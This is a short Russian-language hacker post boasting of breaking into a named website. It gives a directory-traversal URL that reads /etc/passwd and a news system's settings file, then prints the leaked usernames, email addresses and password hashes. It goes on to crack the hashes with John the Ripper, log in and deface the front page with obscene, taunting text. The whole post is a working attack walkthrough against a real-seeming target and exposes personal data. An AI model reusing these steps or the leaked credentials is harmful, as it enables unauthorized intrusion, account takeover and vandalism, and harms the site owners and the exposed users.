Привет ПерЦЫ!
Пишу статью как трахнуть машину
под Apache/PHP. Казалось бы неприступная
крепость, однако это не так. Рассмотрим сие
действо на примере
http://www.dirgotronix.net.
Ошибка обратного пути в скрипте дает нам
права на чтение любого файла с правами nobody.
http://www.dirgotronix.net/index1.php?p=0|1|&inc=../../../../../../etc/passwd
Но это для примера, на самом деле
получить пароли оттуда невозможно, так как
все пассы в shadow. Что же делать и как нам быть?
На сем серваке стоит система новостей NEWSPRO -
ей то и нагадим. Попостим на парадной
странице?
http://www.dirgotronix.net/NewsPro/newspro.cgi
Спрашивает логин и пассу:)) Фигня,
лезем -
http://www.dirgotronix.net/index1.php?p=0|1|&inc=NewsPro/nsettings.cgi.
Смотрим фрагмент:
userdata``xJason~eEVRZUXE83LV2~jason@dirgo.com~3|
Adam~jcQuuR5qQTMIY~darklord420@hotmail.com~1...
~1|Ian~3dqS3BOppYJ12~ceol.mhor@scotland.com~1
приводим сию строку к виду:
---------------------------
Adam:jcQuuR5qQTMIY
xJason:eEVRZUXE83LV2
Libby:q9ns.RuPxitpo
Tom:jJB7ZysImv19U
Donald:BcaF5eZqNrklU
Casey:qP93wjt.N.vIw
Ian:3dqS3BOppYJ12
---------------------------
Сохраняем на своей никсовой
машине aka pass.txt. И даем это файло на
растерзание доброму Джону:
./john pass.txt
Курим пару сигарет и пьем
бутылку ПеННОГО пива. Все. Лезем на:
http://www.dirgotronix.net/NewsPro/newspro.cgi
ПОСТИМ ПОД НИКАМИ РАСШИФРОВАННЫХ
ЮЗВЕРЕЙ ЛЮБУЮ МУТЬ НА ПАРАДНОЙ СТРАНИЦЕ aka :
I`m crazY , I`m FOOL, BUT my penis WONDERFUL!!! HA-HA- HA !! LOVE ME SUCKZZZZ!!!
WE ARE THE
GREATEST! RUSSIA - BEST! FUCKZ TO FBI & US HACKERS!
